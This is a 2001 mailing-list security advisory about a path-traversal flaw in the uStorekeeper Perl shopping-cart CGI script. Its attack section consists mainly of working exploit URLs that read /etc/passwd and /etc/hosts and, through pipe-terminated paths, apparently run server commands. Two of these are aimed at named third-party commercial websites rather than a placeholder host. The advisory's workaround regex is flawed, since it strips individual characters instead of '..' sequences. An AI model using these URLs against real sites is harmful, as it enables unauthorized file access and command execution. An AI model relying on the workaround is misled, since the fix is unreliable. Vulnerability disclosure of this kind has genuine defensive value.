|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: UkR hacking team (ukrteam
UKR.NET)Date: Mon Apr 02 2001 - 23:08:47 CDT
---=== UkR security team - Advisory ===---
uStorekeeper(tm) Online Shopping System - Runtime Script
- 'arbitrary file retreival' vulnerability
Date: 03.04.2001
Problem: input validation error.
Vulnerable products: ustorekeeper.pl version 1.61 (probably others, but not tested)
Product vendor: Microburst Technologies / http://www.uburst.com
Comment: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retreive files from remote sever, which should not be accessible normally (for ex., /etc/passwd).
Workaround:
# this will help in somewhat...
$input =~ s/[(\.\.)|\/]//g;
Author: XblP /UkR security team (www.ukrteam.ru)/GiN group (www.gin.sh)
Greets
Exploit:
http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |
Example:
http://www.lynchs.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
http://www.madamealexanderdollmuseum.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl|
Greets: my love Zemfirius, dev/ice security team, Legion2000 group, Void team, Acidfalz team, IHG team and other ppls.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]